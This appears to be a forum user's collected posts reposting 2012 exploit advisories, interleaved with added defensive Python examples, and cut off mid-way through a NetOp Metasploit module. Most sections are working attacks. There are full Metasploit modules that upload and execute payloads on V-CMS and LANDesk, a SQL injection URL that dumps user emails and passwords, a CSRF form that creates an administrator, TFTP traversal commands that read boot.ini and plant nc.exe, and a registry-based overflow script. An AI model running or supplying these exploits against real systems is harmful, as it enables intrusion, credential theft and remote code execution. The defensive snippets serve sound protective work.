Posts posted by The_Arhitect
IrfanView FlashPix PlugIn Decompression Heap Overflow
#####################################################################################
Application: IrfanView FlashPix PlugIn Decompression Heap Overflow
Platforms: Windows
Secunia Number: SA48772
{PRL}: 2012-08
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Timeline
3) Technical details
4) PoC
#####################################################################################
===============
1) Introduction
===============
IrfanView is a freeware/shareware image viewer for Microsoft Windows that can view, edit, and convert image files
and play video/audio files. It is noted for its small size, speed, ease of use, and ability to handle a wide variety of graphic
file formats, and has some image creation and painting capabilities. The software was first released in 1996.
IrfanView is free for non-commercial use; commercial use requires paid registration.
#####################################################################################
============
2) Timeline
============
2012-04-06 - Vulnerability reported to secunia
2012-04-13 - Coordinated public release of advisory
#####################################################################################
=================
3) Technical details
=================
The vulnerability is caused due to insufficient validation when decompressing FlashPix images
and can be exploited to cause a heap-based buffer overflow via a specially crafted FPX file.
#####################################################################################
=============
4) The PoC
=============
http://www.exploit-db.com/sploits/18739.fpx
#####################################################################################
Source: IrfanView FlashPix PlugIn Decompression Heap Overflow
-
V-CMS PHP File Upload and Execute
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "V-CMS PHP File Upload and Execute",
      'Description'    => %q{
          This module exploits a vulnerability found on V-CMS's inline image upload feature.
          The problem is due to the inline_image_upload.php file not checking the file type
          before saving it on the web server. This allows any malicious user to upload a
          script (such as PHP) without authentication, and then execute it with a GET request.
          The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only
          allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as
          one of those extension names, which may still be leveraged in an attack.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'AutoSec Tools', # Initial discovery
          'sinn3r'         # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2011-4828'],
          ['BID', '50706'],
          ['URL', 'http://bugs.v-cms.org/view.php?id=53'],
          ['URL', 'http://xforce.iss.net/xforce/xfdb/71358']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['V-CMS 1.0', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Nov 27 2011", # When the ticket was created
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to V-CMS', '/vcms/'])
      ], self.class)
  end

  def check
    res = send_request_raw({
      'uri'    => target_uri.path,
      'method' => 'GET'
    })

    if res and res.body =~ /V\-CMS v1\.[0-1]/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def on_new_session(client)
    if client.type == "meterpreter"
      client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
      client.fs.file.rm(@payload_name)
    else
      client.shell_command_token("rm #{@payload_name}")
    end
  end

  def exploit
    peer = "#{rhost}:#{rport}"
    base = target_uri.path
    base << '/' if base[-1,1] != '/'

    @payload_name = "#{rand_text_alpha(5)}.php"
    p = %Q|<?php
    #{payload.encoded}
    ?>
    |

    # Strip the source indentation from the PHP body
    p = p.gsub(/^ {4}/, '')

    post_data  = "------x\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
    post_data << "Content-Type: image/gif\r\n"
    post_data << "\r\n"
    post_data << p
    post_data << "------x--\r\n"

    print_status("#{peer} Uploading payload: #{@payload_name}")
    res = send_request_cgi({
      'uri'    => "#{base}includes/inline_image_upload.php",
      'method' => 'POST',
      'ctype'  => 'multipart/form-data; boundary=----x',
      'data'   => post_data
    })

    if res
      print_status("#{peer} replies status: #{res.code.to_s}")
    else
      print_error("#{peer} No response from server. Will not continue")
      return
    end

    print_status("#{peer} Executing payload: #{@payload_name}")
    res = send_request_raw({
      'uri'    => "#{base}temp/#{@payload_name}",
      'method' => 'GET'
    })

    if res and res.code == 404
      print_error("#{peer} 404 - the upload probably failed")
      return
    end

    handler
  end
end
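The module description above names two weak points: V-CMS 1.0 did no type check at all, and 1.1 checked only the extension, so a PHP script named with an image extension still went through. The following is an added example (not V-CMS code, not part of the Metasploit module) of the server-side validation that closes both gaps; all function and variable names are hypothetical and the sample uploads are constructed.

```python
"""Server-side validation for an image-upload endpoint (added example)."""
import secrets

# The extension allow-list the advisory says V-CMS 1.1 uses.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "bmp"}

# Leading bytes each allowed type must start with. The client-supplied
# Content-Type header is attacker-controlled (the module above simply sends
# "image/gif"), so it is never consulted.
MAGIC_BYTES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
    "bmp":  (b"BM",),
}

# Cheap heuristic against image/script polyglots. It is a second line of
# defence only; the primary fix is storing uploads outside the web root or
# with script execution disabled for that directory.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def validate_image_upload(filename: str, data: bytes):
    """Return (accepted, reason, stored_name).

    stored_name is a server-generated random name carrying only the
    validated extension, so the client's own name (including double
    extensions such as "shell.php.gif") never reaches the filesystem.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed", None
    if not any(data.startswith(sig) for sig in MAGIC_BYTES[ext]):
        return False, "content does not match declared image type", None
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script markers embedded in image data", None
    stored_name = f"{secrets.token_hex(16)}.{ext}"
    return True, "ok", stored_name


# Constructed sample uploads mirroring the cases in the module description.
GIF_HEADER = b"GIF89a\x01\x00\x01\x00\x80\x00\x00"
PHP_STUB = b"<?php /* placeholder script body */ ?>"

SAMPLE_UPLOADS = [
    ("avatar.gif", GIF_HEADER + b"\x00" * 16),            # legitimate image
    ("shell.php", PHP_STUB),                              # V-CMS 1.0: no check at all
    ("shell.gif", PHP_STUB),                              # V-CMS 1.1: extension-only check
    ("shell.php.gif", GIF_HEADER + b"\x00" * 16),         # double extension, real image data
    ("photo.gif", GIF_HEADER + b"\x00" * 16 + PHP_STUB),  # GIF/PHP polyglot
]


def audit_uploads(uploads=SAMPLE_UPLOADS):
    """Run every sample through the validator; returns {filename: reason}."""
    return {name: validate_image_upload(name, data)[1] for name, data in uploads}


if __name__ == "__main__":
    for name, reason in audit_uploads().items():
        print(f"{name:16s} -> {reason}")
```

The double-extension case is accepted on content but stored under a random name, which is what neutralises it.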
EMC IRM License Server DoS Server 4.6.1.1995
#######################################################################
Luigi Auriemma
Application: EMC IRM License Server
http://www.emc.com
Versions: <= 4.6.1.1995
Platforms: Windows
Bugs: A] "version compat check" *FIPS NULL pointer
B] freezing caused by multiple commands
C] NULL pointer caused by commands after invalid version
Exploitation: remote
Date: 10 Apr 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From the manual:
"The IRM Server is a secure server containing a database that stores
the encryption keys needed by authorized users to access protected
content. The database also stores policies that specify who can access
the information and what they can do with it."
#######################################################################
=======
2) Bugs
=======
--------------------------------------------
A] "version compat check" *FIPS NULL pointer
--------------------------------------------
The missing *FIPS fields in the "version compat check" command lead to
a NULL pointer in execution:
004AB67B . 8D45 E4 LEA EAX,DWORD PTR SS:[EBP-1C]
004AB67E . 50 PUSH EAX
004AB67F . 53 PUSH EBX
004AB680 . 8D85 5C020000 LEA EAX,DWORD PTR SS:[EBP+25C]
004AB686 . 50 PUSH EAX
004AB687 . FF75 C4 PUSH DWORD PTR SS:[EBP-3C]
004AB68A . FF55 E8 CALL DWORD PTR SS:[EBP-18] ; NULL pointer
---------------------------------------
B] freezing caused by multiple commands
---------------------------------------
Process freezing caused by some continuous malformed commands, for
example "batch begin untethered" with an Id composed of line-feeds.
Note about the proof-of-concept: manually kill the PoC when everything
seems inactive and you no longer receive data from the server so that
it will start to consume resources.
--------------------------------------------------------
C] NULL pointer caused by commands after invalid version
--------------------------------------------------------
Looks like it's possible to cause some NULL pointer dereferences if the
initial "version compat check" contains an invalid Version and other
commands are then sent.
The effect of all the vulnerabilities is the impossibility of using the
IRM server, the pvcontrol.exe process remains active but it's no longer
usable.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/irm_1.zip
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
-
Software DEP Classified Script 2.5 SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Software DEP Classified Script 2.5 SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Author: h0rd
Contact: h0rd[at]null.net
homepage: http://h0rd.net
download: http://www.softwaredep.com/classified-script.html
Price: $199
PoC exploit:
http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user--
login page:
http://[host]/[script]/admin/
Source: Software DEP Classified Script 2.5 SQL Injection Vulnerability
-
-
BulletProof FTP Client 2010 - Buffer Overflow Vulnerability
Title:
======
BulletProof FTP Client 2010 - Buffer Overflow Vulnerability
Date:
=====
2012-04-02
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=475
VL-ID:
=====
475
Introduction:
=============
BPFTP Client is a fully automated FTP client, with many advanced features including automatic download resuming,
leech mode, ftp search and much more. Perfect for personal or corporate Webmasters as well as for Software and Music traders.
Features:
+ Automatic Resume/Reconnect
+ Browse Offline with Cache
+ Leech Mode
+ Hidden File Support
+ Download Credit/Ratio Support
+ Clipboard Monitor
+ Queue 1,000s of Actions
+ Proxy/Firewall Support
+ HTTP/Webserver Support
+ Import CuteFTP, WS_FTP, FTP Explorer
+ Remote Mirroring
+ Search and Filter Ability
(Copy of the Vendor Homepage: http://www.bpftp.com )
Abstract:
=========
A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on BulletProof FTP Client v2010.75.0.76
Report-Timeline:
================
2012-03-14: Vendor Notification
2012-03-16: Vendor Response/Feedback
2012-04-02: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
BulletProof
Product: BPFTP Client Software (Windows) v2010.75.0.76 & 2011.x
Exploitation-Technique:
=======================
Local
Severity:
=========
High
Details:
========
A Buffer Overflow vulnerability is detected on BulletProof FTP Client v2010.75.0.76 (current version). The vulnerability is located
in the main executable bpftpclient.exe. During the start of the application the value LogFileName from the
registry key [HKEY_CURRENT_USER/Software/BulletProof Software/BulletProof FTP Client 2010/Options] is read.
When an oversized value is inserted into the registry value, a buffer overflow is triggered. The victim only needs to start the application.
Vulnerable Module(s):
[+] bpftpclient.exe
--- Debugger Logs ---
# 42424242: The instruction at 0x42424242 referenced memory at 0x42424242.
The memory could not be read -> 42424242 (exc.code c0000005, tid 2264)
# Registers:
# EAX 00000000
# ECX 42424242
# EDX 7C9132BC ntdll.7C9132BC
# EBX 00000000
# ESP 0012F594
# EBP 0012F5B4
# ESI 00000000
# EDI 00000000
# EIP 42424242
# Stack:
# 0012F588 00140198
# 0012F58C 7C91D80A ntdll.7C91D80A
# 0012F590 7C9601E1 ntdll.7C9601E1
# 0012F594 7C9132A8 RETURN to ntdll.7C9132A8
# 0012F598 0012F67C
# 0012F59C 0012FBCC ASCII ``AAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC``
# 0012F5A0 0012F698
# Dump:
# 0012FBB4 41 41 41 41 41 41 41 41 AAAAAAAA
# 0012FBBC 41 41 41 41 41 41 41 41 AAAAAAAA
# 0012FBC4 41 41 41 41 41 41 41 41 AAAAAAAA
# 0012FBCC 41 41 41 41 42 42 42 42 AAAABBBB
# 0012FBD4 43 43 43 43 43 43 43 43 CCCCCCCC
# 0012FBDC 43 43 43 43 43 43 43 43 CCCCCCCC
# 0012FBE4 43 43 43 43 43 43 43 43 CCCCCCCC
Picture(s):
../1.png
../2.png
Proof of Concept:
=================
The vulnerability can be exploited by local attackers. Successful exploitation requires no user interaction. For demonstration or reproduce ...

#!/usr/bin/python
# Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow
# Version: 2010.75.0.76
# Date: 2012-03-11
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.bpftp.com/
# Tested on: Windows XP SP3 Professional German
# Notes: -
# Howto: Import Reg -> Start App

file = "poc.reg"

junk1 = "\x41" * 448   # padding up to the saved return address
boom = "\x42\x42\x42\x42"   # lands in EIP (see debugger log above)
junk2 = "\x43" * 100

poc = "Windows Registry Editor Version 5.00\n\n"
poc = poc + "[HKEY_CURRENT_USER\\Software\\BulletProof Software\\BulletProof FTP Client 2010\\Options]\n"
poc = poc + "\"LogFileName\"=\"" + junk1 + boom + junk2 + "\""

try:
    print("[*] Creating exploit file...\n")
    with open(file, "w") as writeFile:
        writeFile.write(poc)
    print("[*] File successfully created!")
except IOError:
    print("[!] Error while creating file!")
Risk:
=====
The security risk of the local buffer overflow vulnerability is estimated as high(+).
Credits:
========
Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net]
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2012 | Vulnerability-Lab
--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com
Source: BulletProof FTP Client 2010 - Buffer Overflow Vulnerability
-
Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Date: 7/4/2012
# Author: Dr.NaNo
# Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1
# Version: 1.4.0
# Tested on: Linux-Red-Hat
# Google Dork: Powered By Utopia News Pro 1.4.0
#
########################################################
# ~ Exploit ~ #
########################################################
<html>
<body>
<form action="http://localhost/{PATh}/upload/users.php" method="post">
<input type="hidden" name="username" value="NANO" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="password" value="102030" />
<input type="hidden" name="password2" value="102030" />
<input type="hidden" name="email" value="security@security.com" />
<input type="submit" name="submitnew" accesskey="s" value="ThankS !" />
</form>
</body>
</html>
#### ~ Greetz ~ #########################################################
# #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020 #
# #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng #
# #
############################################### ~ All FriendS ~ #########
Source: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
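The forged form above succeeds because users.php accepts the "submitnew" POST from any page a logged-in admin happens to visit. As an added example (not Utopia News Pro code), the checks below show the two independent controls that stop it: a session-bound synchronizer token the foreign page cannot know, and an Origin/Referer check the browser fills in itself. The site origin, function names and request dictionaries are hypothetical; the forged request reuses the field values from the exploit form.

```python
"""Anti-CSRF checks for a state-changing admin form (added example)."""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://news.example.test"  # constructed site origin


def issue_csrf_token(session: dict) -> str:
    """Create (or reuse) the session-bound token to embed in our own forms."""
    session.setdefault("csrf_token", secrets.token_urlsafe(32))
    return session["csrf_token"]


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def check_state_changing_request(session: dict, form: dict, headers: dict):
    """Return (allowed, reason) for a POST that creates or modifies data."""
    # 1. Synchronizer token: the attacker's page cannot read our session
    #    token, so a forged form either omits it or guesses wrong.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"

    # 2. Origin/Referer: browsers add these to cross-site form posts and
    #    page scripts cannot override them. Prefer Origin, fall back to
    #    Referer, and for a state-changing request reject if both are absent.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin or Referer on state-changing request"
    if _origin_of(source) != SITE_ORIGIN.lower():
        return False, f"cross-site request from {_origin_of(source)}"
    return True, "ok"


def demo():
    """Replay the advisory's forged POST and legitimate variants; return verdicts."""
    session = {"user": "admin"}
    token = issue_csrf_token(session)

    # The hidden-field form from the exploit: no token, posted from another site.
    forged_form = {"username": "NANO", "groupid": "1", "password": "102030",
                   "password2": "102030", "email": "security@security.com",
                   "submitnew": "ThankS !"}
    forged_headers = {"Origin": "http://attacker.example.test",
                      "Referer": "http://attacker.example.test/lure.html"}

    # A legitimate submission from our own admin page, token included.
    good_form = dict(forged_form, csrf_token=token)
    good_headers = {"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/admin/users.php"}

    # A guessed token from the right origin still fails.
    guessed_form = dict(forged_form, csrf_token=secrets.token_urlsafe(32))

    return {
        "forged": check_state_changing_request(session, forged_form, forged_headers),
        "legitimate": check_state_changing_request(session, good_form, good_headers),
        "guessed_token": check_state_changing_request(session, guessed_form, good_headers),
        "token_no_origin": check_state_changing_request(session, good_form, {}),
    }


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case:16s} -> {verdict}")
```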
-
Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability
# Exploit Title: Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability
# Date: April 8, 2012
# Software Link: http://www.distinct.com/index.php/downloads/index/p=ISERV
# Affected Versions: 3.01; previous versions may also be affected
# Tested on: Windows XP SP3, Windows Server 2003 , Windows 7 SP1
Software Description
--------------------
Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.
Vulnerability Details
---------------------
The vulnerability is caused due to improper validation of GET and PUT requests containing dot dot slash ('../') sequences, which allows attackers to read or write arbitrary files.
Attack Vector
-------------
By requesting a dot dot slash within the GET or PUT request, it is possible to retrieve operating system file such as boot.ini or upload file (errh, nc.exe?) to Windows %systemroot% (C:\WINDOWS\system32\).
Impact
------
Read and write files from remote machine.
Proof of Concept
----------------
We assume that the directory is deep enough, so you have to set a deep path on the server configuration. If a GET request followed with '../../' (dot dot slash), trying to retrieve boot.ini file, is sent to Distinct TFTP Server 3.01, the file will be retrieved successfully.
hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> get ../../../../../../../../../../../../../boot.ini
Received 211 bytes in 0.0 seconds
tftp>
Next, if we try to upload a file, let say Netcat (nc.exe), to Windows %systemroot% directory (C:\WINDOWS\system32\) using a PUT command, here is the result:
hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> put /Pentest/backdoor/nc.exe ../../../../../../../../../../../../../../../Windows/system32/nc.exe
Sent 59392 bytes in 0.3 seconds
tftp>
Netcat successfully uploaded.
Other combinations:
tftp> get ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
tftp> put /Pentest/backdoor/nc.exe ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\nc.exe
Solution Status
---------------
Unavailable
Risk Factor
-----------
CVSS Base Score = 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Exploitability Subscore = 10
Impact Subscore = 4.9
CVSS Temporal Score = 5.2
Overall CVSS Score = 5.8
Risk factor = Medium
Credits
-------
Tom Gregory from Spentera Research
References
----------
http://www.spentera.com/advisories/2012/SPN-01-2012.pdf
Disclosure Timeline
-------------------
March 28, 2012, issue discovered
March 28, 2012, vendor contacted about the issue, no response
April 9, 2012, public advisory released
Source: Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability
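The advisory shows that the server applies the requested filename to the filesystem without rejecting '../' or '..\' components, and that both separator styles work. The resolver below is an added example (not Distinct TFTP code) of the confinement check a TFTP server needs before touching a file: it maps an RRQ/WRQ filename onto a configured root, refuses anything that would leave it, and runs the advisory's own requests plus some ordinary ones through the check. The root path, function names and sample requests are hypothetical.

```python
"""Path confinement for a TFTP-style file server (added example)."""
import posixpath
import re

_DRIVE_LETTER = re.compile(r"^[A-Za-z]:")


def safe_tftp_path(root: str, requested: str) -> str:
    """Return the path under `root` for `requested`, or raise ValueError."""
    if not requested or "\x00" in requested:
        raise ValueError("empty filename or embedded NUL")
    # A Windows server treats '\' as a separator, so the check must too;
    # otherwise '..\..\boot.ini' passes a filter that only looks for '../'.
    name = requested.replace("\\", "/")
    if name.startswith("/") or _DRIVE_LETTER.match(name):
        raise ValueError("absolute, drive or UNC path not allowed")
    # Check whole components rather than substrings: filters that strip the
    # text '../' can be defeated by '....//', and '..' is only dangerous as
    # a complete component.
    parts = [p for p in name.split("/") if p not in ("", ".")]
    if not parts:
        raise ValueError("no file component")
    if ".." in parts:
        raise ValueError("parent-directory reference not allowed")
    root_norm = posixpath.normpath(root)
    full = posixpath.normpath(posixpath.join(root_norm, *parts))
    # Final containment check, independent of the component rules above.
    if not full.startswith(root_norm.rstrip("/") + "/"):
        raise ValueError("resolved path escapes the served directory")
    return full


def is_confined(root: str, requested: str) -> bool:
    """Boolean form of safe_tftp_path for filters and tests."""
    try:
        safe_tftp_path(root, requested)
        return True
    except ValueError:
        return False


def classify_request(root: str, op: str, filename: str) -> str:
    """Verdict line for one request, suitable for a server log or alert."""
    try:
        return f"allow {op} -> {safe_tftp_path(root, filename)}"
    except ValueError as exc:
        return f"deny {op} {filename!r}: {exc}"


# Constructed requests: the advisory's traversal attempts plus ordinary ones.
SAMPLE_REQUESTS = [
    ("get", "../../../../../../../../../../../../../boot.ini"),
    ("put", "../../../../../../../../../../../../../../../Windows/system32/nc.exe"),
    ("get", "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini"),
    ("get", "pxelinux.0"),
    ("get", "images/./router.bin"),
    ("put", "uploads/../../../etc/passwd"),
    ("get", "C:\\Windows\\win.ini"),
]


def audit(root: str, requests=SAMPLE_REQUESTS):
    """Return (allowed_count, denied_count, verdict_lines) for a batch of requests."""
    verdicts = [classify_request(root, op, name) for op, name in requests]
    denied = sum(v.startswith("deny") for v in verdicts)
    return len(verdicts) - denied, denied, verdicts


if __name__ == "__main__":
    allowed, denied, lines = audit("/srv/tftp")
    print("\n".join(lines))
    print(f"{allowed} allowed, {denied} denied")
```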
-
LANDesk Lenovo ThinkManagement Console Remote Command Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize
    super(
      'Name'           => 'LANDesk Lenovo ThinkManagement Console Remote Command Execution',
      'Description'    => %q{
          This module can be used to execute a payload on LANDesk Lenovo
          ThinkManagement Suite 9.0.2 and 9.0.3.

          The payload is uploaded as an ASP script by sending a specially crafted
          SOAP request to "/landesk/managementsuite/core/core.*********/ServerSetup.asmx",
          via a "RunAMTCommand" operation with the command '-PutUpdateFileCore'
          as the argument.

          After execution, the ASP script with the payload is deleted by sending
          another specially crafted SOAP request to "WSVulnerabilityCore/VulCore.asmx"
          via a "SetTaskLogByFile" operation.
      },
      'Author'         =>
        [
          'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC
          'juan vazquez'      # Metasploit module
        ],
      'Version'        => '$Revision: $',
      'Platform'       => 'win',
      'References'     =>
        [
          ['CVE', '2012-1195'],
          ['CVE', '2012-1196'],
          ['OSVDB', '79276'],
          ['OSVDB', '79277'],
          ['BID', '52023'],
          ['URL', 'http://www.exploit-db.com/exploits/18622/'],
          ['URL', 'http://www.exploit-db.com/exploits/18623/']
        ],
      'Targets'        =>
        [
          [ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2', { } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Feb 15 2012'
    )

    register_options(
      [
        OptString.new('PATH', [ true, "The URI path of the LANDesk Lenovo ThinkManagement Console", '/'])
      ], self.class)
  end

  def exploit
    peer = "#{rhost}:#{rport}"

    # Generate the ASP containing the EXE containing the payload
    exe = generate_payload_exe
    asp = Msf::Util::EXE.to_exe_asp(exe)

    # htmlentities like encoding, so the ASP survives being embedded in the SOAP XML
    asp = asp.gsub("&", "&amp;").gsub("\"", "&quot;").gsub("'", "&apos;").gsub("<", "&lt;").gsub(">", "&gt;")

    uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")

    upload_random   = rand_text_alpha(rand(6) + 6)
    upload_xml_path = "ldlogon\\#{upload_random}.asp"

    soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <RunAMTCommand xmlns="http://tempuri.org/">
      <Command>-PutUpdateFileCore</Command>
      <Data1>#{rand_text_alpha(rand(4) + 4)}</Data1>
      <Data2>#{upload_xml_path}</Data2>
      <Data3>#{asp}</Data3>
      <ReturnString>#{rand_text_alpha(rand(4) + 4)}</ReturnString>
    </RunAMTCommand>
  </soap:Body>
</soap:Envelope>
    eos

    #
    # UPLOAD
    #
    attack_url = uri_path + "landesk/managementsuite/core/core.*********/ServerSetup.asmx"
    print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...")
    res = send_request_cgi({
      'uri'     => attack_url,
      'method'  => 'POST',
      'ctype'   => 'text/xml; charset=utf-8',
      'headers' => {
        'SOAPAction' => "\"http://tempuri.org/RunAMTCommand\"",
      },
      'data'    => soap,
    }, 20)

    if (! res)
      print_status("#{peer} - Timeout: Trying to execute the payload anyway")
    elsif (res.code < 200 or res.code >= 300)
      print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]")
      return
    end

    #
    # EXECUTE
    #
    upload_path = uri_path + "ldlogon/#{upload_random}.asp"
    print_status("#{peer} - Executing #{upload_path}...")
    res = send_request_cgi({
      'uri'    => upload_path,
      'method' => 'GET'
    }, 20)

    if (! res)
      print_error("#{peer} - Execution failed on #{upload_path} [No Response]")
      return
    end

    if (res.code < 200 or res.code >= 300)
      print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
      return
    end

    #
    # DELETE
    #
    soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetTaskLogByFile xmlns="http://tempuri.org/">
      <computerIdn>1</computerIdn>
      <taskid>1</taskid>
      <filename>../#{upload_random}.asp</filename>
    </SetTaskLogByFile>
  </soap:Body>
</soap:Envelope>
    eos

    attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx"
    print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...")
    res = send_request_cgi({
      'uri'     => attack_url,
      'method'  => 'POST',
      'ctype'   => 'text/xml; charset=utf-8',
      'headers' => {
        'SOAPAction' => "\"http://tempuri.org/SetTaskLogByFile\"",
      },
      'data'    => soap,
    }, 20)

    if (! res)
      print_error("#{peer} - Deletion failed at #{attack_url} [No Response]")
      return
    elsif (res.code < 200 or res.code >= 300)
      print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]")
      return
    end

    handler
  end
end
Source: LANDesk Lenovo ThinkManagement Console Remote Command Execution
-
NetOp Remote Control Client 9.5 Buffer Overflow
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NetOp Remote Control Client 9.5 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.
          Opening a .dws file containing a specially crafted string longer than 520
          characters allows an attacker to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ruben Alejandro "chap0"',
        ],
      'References'     =>
        [
          [ 'OSVDB', '72291' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/17223/' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction'          => 'process',
